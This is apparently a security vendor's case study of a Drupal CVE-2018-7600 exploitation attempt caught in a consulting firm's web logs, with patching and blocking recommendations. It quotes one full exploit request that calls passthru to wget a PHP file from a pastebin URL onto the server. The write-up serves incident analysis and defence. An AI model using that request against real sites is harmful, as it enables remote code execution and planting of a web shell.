Remote Code Execution at Public Facing Website

The Network: A global management consulting firm with locations across the USA and UK.
 
The Expectation: EventTracker Co-Managed SIEM services, advanced endpoint protection, and behavior analytics would deliver added protection for company assets.
 
The Catch: The Drupal CMS v7 and v8 are known to be vulnerable to a remote code execution attack. CVE-2018-7600 provides details. After the vulnerability was disclosed, the SIEMphonic Enterprise team monitored web logs of external facing web servers for evidence of such attack.
 
The Find: A few weeks after the disclosure of the vulnerability, an attempt to exploit was observed as follows: /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=wget+https://pastebin.com/raw/tBqLLGbw+-O+spy0x.php HTTP/1.1. Note the use of #post_render & name parameters, targeting user/password request, using PHP's passthru function. The payload retrieves a host where the host name of the target is prefixed (pastebin.com/raw/tBqLLGbw+-O+spy0x.php) to the host name to be retrieved. The return code was 200 and attacks were observed from a hosting provider in Amsterdam, NL
 
The Fix: The SIEMphonic Enterprise team made the following recommendations:
  1. Upgrade to the most recent version of Drupal 7 or 8 core.
  2. If you are running 7.x, upgrade to Drupal 7.58. (if you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update).
  3. If you are running 8.5.x, upgrade to Drupal 8.5.1. (if you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update).
  4. Block the IP addresses in the proxy and firewall.
  5. Investigate further on the internal source system and Proxy devices.
  6. Install the latest version of your web server software, and ensure that all patches have been applied.
  7. Check the browser and system infection, and run the anti-virus scans.
  8. Use a Web Vulnerability Scanner and integrate it with EventTracker.
  9. Harden and update Proxy and firewall with the IOCs.
The Lesson: Vulnerabilities are a fact of life. They exist and are disclosed and patched by vendors. Keeping on top of these across all vendors is a thankless and endless, but critical task. Absent this, attacks like Equifax will occur. Eternal vigilance is critical.